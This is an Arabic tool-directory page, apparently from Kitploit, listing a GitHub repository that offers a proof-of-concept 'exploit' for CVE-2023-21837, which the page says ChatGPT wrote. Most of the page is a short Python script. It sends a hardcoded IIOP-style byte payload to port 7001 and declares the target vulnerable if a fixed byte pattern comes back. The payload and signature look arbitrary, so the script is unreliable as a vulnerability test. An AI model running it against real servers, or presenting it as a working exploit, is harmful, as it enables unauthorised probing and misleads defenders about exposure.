Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-21837 — POC,EXP, chatGPT لي | Kitploit
أدوات/GitHubGitHub/hktalent/cve-2023-21837
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقتطوير الحمولات
GitHubhktalent/cve-2023-21837

CVE-2023-21837

POC,EXP, chatGPT لي

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-21837

POC,EXP, chatGPT من أجلي

الكود

root@kitploit:~
import socket

# CVE-2023-21837
def check_vulnerability(target_host, target_port):
    # create socket object
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # set timeout to 30 seconds
    s.settimeout(30)
    try:
        # connect to target
        s.connect((target_host, target_port))
        # send exploit payload
        s.send(b'\x49\x49\x4f\x50\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00')
        # receive response
        response = s.recv(1024)
        # check if response indicates vulnerability
        if b'Y\x02\x0f\x00\x00\x00\x00\x00\x00\x00' in response:
            print(f"Target {target_host}:{target_port} is vulnerable!")
        else:
            print(f"Target {target_host}:{target_port} is not vulnerable.")
    except socket.timeout:
        print(f"Connection to {target_host}:{target_port} timed out.")
    except ConnectionRefusedError:
        print(f"Connection to {target_host}:{target_port} was refused.")
    except Exception as e:
        print(f"Error: {e}")
    finally:
        # close socket
        s.close()

# example usage
check_vulnerability('127.0.0.1', 7001)

تنزيل الأداة